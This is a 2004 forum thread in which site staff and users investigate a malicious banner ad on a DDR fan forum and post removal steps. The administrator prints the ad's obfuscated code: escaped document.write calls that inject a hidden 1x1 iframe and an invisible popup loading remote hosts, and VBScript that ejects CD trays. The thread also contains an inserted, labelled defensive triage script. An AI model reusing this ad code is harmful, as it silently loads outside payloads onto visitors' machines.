Rychan Contributor
Joined: 01 Jul 2003 Location: Castle Rock, CO |
40. Posted: Thu Feb 26, 2004 3:37 pm Post subject: |
|
|
J Dogg wrote: | Rychan wrote: | I'm starting to get File Download popup with each page I go to.
htm.htm is the file name
www.achtungachtung.com is where it's from.
This is really really annoying.... |
It's most likely caused by some adware, spyware, or virus from your computer. As of now, we don't have any popups, file downloads, or anything on DDR Freak ads. | It is accompanying that My Sound Works banner. _________________
J Dogg Administrator
Joined: 16 Jan 2002 Location: Sunnyvale, CA |
41. Posted: Thu Feb 26, 2004 4:08 pm Post subject: |
|
|
I have never seen a My Sound Works banner.. can you link to it please?
Edit: I found it, and it's pretty ridiculous. It has vbscript that attempts to open your cd tray, and some other stuff hidden in unicode. Check this out:
http://209.50.251.151/mysoundworks/msw-h.html
Code: |
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0061\u0063\u0068\u0074\u0075\u006e\u0067\u0061\u0063\u0068\u0074\u0075\u006e\u0067\u002e\u0063\u006f\u006d\u002f\u0030\u0030\u0032\u0031\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>
<a HREF="http://www.mysoundworks.com/landing1.html" TARGET="_blank"><img BORDER="0" WIDTH="468" HEIGHT="60" ALT="Click here to visit our sponsor"
SRC="http://209.50.251.151/mysoundworks/mysoundworks-468x60.gif"></a>
<script type="text/javascript">document.write('\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u006c\u0061\u006e\u0067\u0075\u0061\u0067\u0065\u003d\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u000d\u000a\u0076\u0061\u0072\u0020\u006f\u0050\u006f\u0070\u0075\u0070\u0020\u003d\u0020\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u0063\u0072\u0065\u0061\u0074\u0065\u0050\u006f\u0070\u0075\u0070\u0028\u0029\u003b\u000d\u000a\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0073\u0068\u006f\u0077\u0050\u006f\u0070\u0075\u0070\u0028\u0029\u000d\u000a\u007b\u000d\u000a\u0009\u006f\u0050\u006f\u0070\u0075\u0070\u002e\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u002e\u0069\u006e\u006e\u0065\u0072\u0048\u0054\u004d\u004c\u0020\u003d\u0020\u0022\u003c\u006f\u0062\u006a\u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006f\u0062\u006a\u0065\u0063\u0074\u002e\u0070\u0061\u0073\u0073\u0074\u0068\u0069\u0073\u006f\u006e\u002e\u0063\u006f\u006d\u002f\u0076\u0075\u0030\u0038\u0033\u0030\u0030\u0033\u002f\u006f\u0062\u006a\u0065\u0063\u0074\u002e\u0063\u0067\u0069\u003f\u0068\u006f\u006d\u0065\u0070\u0061\u0067\u0065\u0031\u003e\u0022\u003b\u000d\u000a\u0009\u006f\u0050\u006f\u0070\u0075\u0070\u002e\u0073\u0068\u006f\u0077\u0028\u0030\u002c\u0030\u002c\u0031\u002c\u0031\u002c\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u0029\u003b\u000d\u000a\u007d\u000d\u000a\u0073\u0068\u006f\u0077\u0050\u006f\u0070\u0075\u0070\u0028\u0029\u000d\u000a\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e')</script>
<script language=javascript>
var expdate = new Date((new Date()).getTime() + 72000000);
if (document.cookie.indexOf("del20hr") == -1) {
document.cookie="del20hr=general; expires=" + expdate.toGMTString() + "; path=/;";
}
</script>
<script language=javascript>
var expdate = new Date((new Date()).getTime() + 72000000);
if (document.cookie.indexOf("hp20hr") == -1) {
document.cookie="hp20hr=general; expires=" + expdate.toGMTString() + "; path=/;";
}
</script>
|
The top code opens an iframe:
Code: |
<iframe src="http://www.achtungachtung.com/0021/index.php" width=1 height=1></iframe>
|
The bottom code is vbscript that attempts to open your CD tray:
Code: |
<script LANGUAGE="VBScript">
<!--
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If
-->
</script>
|
I have notified the ad people already to take down this ad. In the meantime, IguanaGrrl knows how to change your configuration so this doesn't happen anymore--I'll ask her to post the fix here later. _________________
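Added example, not part of the post above or of the ad's own code: a static triage script for banner markup of the kind quoted in that post. It decodes the `\uXXXX` escapes as plain text (nothing is evaluated or fetched) and lists the remote iframe/object loads the `document.write` calls would inject, flagging 1x1 ones. The sample markup, its `example.test` hosts and all function names are constructed for this illustration.

```javascript
// Added example: static triage of ad markup that hides tags behind \uXXXX escapes.
// The escapes are decoded as text only; nothing is evaluated or fetched.

// Decode \uXXXX escapes without eval() or new Function().
function decodeUnicodeEscapes(s) {
  return s.replace(/\\u([0-9a-fA-F]{4})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Return the decoded string-literal argument of every document.write('...') call.
function extractWrites(html) {
  const re = /document\.write\(\s*(['"])((?:\\.|(?!\1)[^\\])*)\1\s*\)/g;
  return [...html.matchAll(re)].map(m => decodeUnicodeEscapes(m[2]));
}

// List remote content the decoded markup would load, flagging 1x1 (invisible) loads.
function triage(html) {
  const findings = [];
  for (const decoded of extractWrites(html)) {
    // An IE popup shown with width/height of 0 or 1 is effectively invisible.
    const tinyPopup = /\.show\(\s*\d+\s*,\s*\d+\s*,\s*[01]\s*,\s*[01]\s*[,)]/.test(decoded);
    for (const [, tag, attrs] of decoded.matchAll(/<(iframe|object|embed|script)\b([^>]*)>/gi)) {
      const url = (attrs.match(/\b(?:src|data)\s*=\s*["']?([^"'\s>]+)/i) || [])[1];
      if (!url) continue; // inline script with no remote source
      const w = (attrs.match(/\bwidth\s*=\s*["']?(\d+)/i) || [])[1];
      const h = (attrs.match(/\bheight\s*=\s*["']?(\d+)/i) || [])[1];
      const tinyTag = w !== undefined && h !== undefined && Number(w) <= 1 && Number(h) <= 1;
      findings.push({ tag: tag.toLowerCase(), url, hidden: tinyTag || tinyPopup });
    }
  }
  return findings;
}

// Constructed sample (placeholder hosts), encoded the same way as the banner above.
const toEscapes = s =>
  [...s].map(c => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0')).join('');
const SAMPLE_AD =
  "<script>document.write('" +
  toEscapes('<iframe src="http://ads.example.test/0000/index.php" width=1 height=1></iframe>') +
  "')</script>\n" +
  '<a href="http://sponsor.example.test/"><img src="banner.gif" width="468" height="60"></a>\n' +
  "<script>document.write('" +
  toEscapes('<script language=javascript>\r\nvar p = window.createPopup();\r\n' +
    'p.document.body.innerHTML = "<object data=http://obj.example.test/object.cgi?x>";\r\n' +
    'p.show(0,0,1,1,document.body);\r\n</script>') +
  "')</script>";

console.log(triage(SAMPLE_AD));
```

The visible banner link and image produce no findings; only the two escaped `document.write` payloads do.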
VxJasonxV Maniac Member
Joined: 08 Feb 2002 Location: Castle Rock, CO |
42. Posted: Thu Feb 26, 2004 5:36 pm Post subject: |
|
|
That is downright horrible...
I wouldn't be surprised if their e-mail server is destroyed by day's end... _________________
Rychan Contributor
Joined: 01 Jul 2003 Location: Castle Rock, CO |
43. Posted: Thu Feb 26, 2004 11:44 pm Post subject: |
|
|
J Dogg wrote: | I have never seen a My Sound Works banner.. can you link to it please?
I have notified the ad people already to take down this ad. In the meantime, IguanaGrrl knows how to change your configuration so this doesn't happen anymore--I'll ask her to post the fix here later. | Sorry I was away from my computer the rest of the day. I saw the banner again this evening but it didn't open that save file window again.
[edit] spoke too soon, even did it when I came to edit this post. _________________
IguanaGrrl Staff Member
Joined: 17 Jan 2002 Location: Sacramento, CA |
44. Posted: Fri Feb 27, 2004 6:13 am Post subject: |
|
|
J Dogg wrote: |
I have notified the ad people already to take down this ad. In the meantime, IguanaGrrl knows how to change your configuration so this doesn't happen anymore--I'll ask her to post the fix here later. |
I don't know how to make it not happen anymore, but I know how to fix the obnoxious regkeys it leaves.
Step #1:
Download a program called HijackThis
Step #2: Open the program.
Step #3: Press the Scan button.
The program will scan your computer for regkeys that might be dangerous. It is imperative that you only remove exact matches, because other items might cause issues with other programs in your computer. This is not something you want to play with unless you have instruction or a STRONG working knowledge of your computer.
Step #4: Close all other windows
Step #5: Look through the list for the following items:
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = »www.default-homepage-network.com/start
O2 - BHO: (no name) - {029CA12C-89C1-46a7-A3C7-82F2F98635CB} - (no file)
O4 - HKCU\..\Run: [msmc] C:\WINDOWS\System32\mscpbo.exe
If you find one of these items, select the checkbox next to the item.
Step #7: Press Fix Checked and then close the program.
You should be obnoxious issue free at this point. If you have further problems with this one, let me know so I can further research. The above fixed my issues on multiple computers. _________________
Cutriss Staff Member
Joined: 24 Jan 2002
|
45. Posted: Fri Feb 27, 2004 7:39 am Post subject: |
|
|
My god...Horizontal scrolling from hell... _________________
Sentient Mode is capable... |
VxJasonxV Maniac Member
Joined: 08 Feb 2002 Location: Castle Rock, CO |
46. Posted: Fri Feb 27, 2004 12:38 pm Post subject: |
|
|
Blame JDogg. _________________
J Dogg Administrator
Joined: 16 Jan 2002 Location: Sunnyvale, CA |
47. Posted: Fri Feb 27, 2004 2:45 pm Post subject: |
|
|
Cutriss wrote: | My god...Horizontal scrolling from hell... |
Funny.. on IE I don't get any scrolling _________________
sfetaz Vivid Member
Joined: 02 May 2002
|
48. Posted: Fri Feb 27, 2004 3:14 pm Post subject: |
|
|
TYPINGTHISSOITDOESNOTAUTOLINK***www.achtungachtung.com***
That site contains trojan horses on all its pages that automatically get on your PC when visiting DDRFreak's forum. Luckily my Norton antivirus picks it up each time, but I am 100% certain it is from DDRFreak forums. The virus is called Download.Trojan.
It also changes your homepage default and ejects your CDROM drives. |
VxJasonxV Maniac Member
Joined: 08 Feb 2002 Location: Castle Rock, CO |
49. Posted: Fri Feb 27, 2004 5:43 pm Post subject: |
|
|
Hi,
We've been talking about this throughout the whole page.
There are even fixes posted just 4 posts up from yours.
Thanks. _________________
sfetaz Vivid Member
Joined: 02 May 2002
|
50. Posted: Sat Feb 28, 2004 5:06 am Post subject: |
|
|
I did not see mention of getting a virus from the site so I felt it necessary to post. According to Norton the virus attempts to download other viruses to your computer, which is a serious matter. |
VxJasonxV Maniac Member
Joined: 08 Feb 2002 Location: Castle Rock, CO |
51. Posted: Sat Feb 28, 2004 8:23 am Post subject: |
|
|
My bad. However, the same thing was reported last page, and the discussion has carried through to this page. _________________
KillerJello Trick Member
Joined: 21 Jan 2004 Location: Flint, MI\Beulah, MI |
52. Posted: Sat Feb 28, 2004 3:49 pm Post subject: |
|
|
There have been several browser hijack attempts coming from this site over the past couple days... |
once was dcb Trick Member
Joined: 24 Jan 2002
|
53. Posted: Sun Feb 29, 2004 12:43 am Post subject: |
|
|
I made that thread about the ad/spyware problem. Well, that same pop up that was popping up now pops up EVERY TIME I close my browser window. At first, it popped up only when I closed DDRFreak Forums, but now it is EVERY TIME. Adaware and SpyBot don't pick this up, so I don't know what the hell it is. The pop up comes from "belgiandip.com" |
IguanaGrrl Staff Member
Joined: 17 Jan 2002 Location: Sacramento, CA |
54. Posted: Sun Feb 29, 2004 8:38 am Post subject: |
|
|
Randy Slake wrote: | I made that thread about the ad/spyware problem. Well, that same pop up that was popping up now pops up EVERY TIME I close my browser window. At first, it popped up only when I closed DDRFreak Forums, but now it is EVERY TIME. Adaware and SpyBot don't pick this up, so I don't know what the hell it is. The pop up comes from "belgiandip.com" |
Seconded. I'm not sure where this is coming from and I've updated my Adaware and Spybot as much as possible and can't find a thing on it. I can't even find anything on the internet about how to fix this one, so if someone comes across a cure, let me know. _________________
Edible Bondage Tape Trick Member
Joined: 26 Jan 2002 Location: Kerri |
55. Posted: Sun Feb 29, 2004 12:08 pm Post subject: |
|
|
And HijackThis didn't find any suspicious things that could be attributed to it. _________________
once was dcb Trick Member
Joined: 24 Jan 2002
|
56. Posted: Sun Feb 29, 2004 1:01 pm Post subject: |
|
|
This fucking pop up got worse. Now it pops up with the belgiandip window, along with another window containing an actual advertisement. I looked at the URL of the new pop up that comes up, and it's fucking GATOR. Gator is pure evil. |
Rychan Contributor
Joined: 01 Jul 2003 Location: Castle Rock, CO |
57. Posted: Mon Mar 01, 2004 10:52 am Post subject: |
|
|
I noticed scrolling on a thread that didn't have a chain of text or anything to cause such. I thought it was nothing until I was in the Console Games forum and it did the same thing.
There's a search ad banner that is causing the About DDR etc part of the page to scoot over past the Logout. I have a screenshot since the search changes the text each time. First was Omni Casino, second was some hotels thing.
This was the one when I posted this in the first place _________________
LouieT Trick Member
Joined: 06 Nov 2002 Location: Visalia, Central CA |
58. Posted: Mon Mar 01, 2004 4:21 pm Post subject: |
|
|
Ugh, another pop-up installer.
Click for screenshot It's something about Flashtalk. |
J Dogg Administrator
Joined: 16 Jan 2002 Location: Sunnyvale, CA |
59. Posted: Mon Mar 01, 2004 5:47 pm Post subject: |
|
|
The my sound works banner is gone... but now we have to take care of the other annoying ones. Ugh, I don't know what the problem is with these ad people. I'm very sorry... I'm talking to the ad people about it.
The problem is that I'm at the very end of the ad chain (me -> host -> ad people -> advertisers), so I apologize if it takes a few days for these things to be taken care of. _________________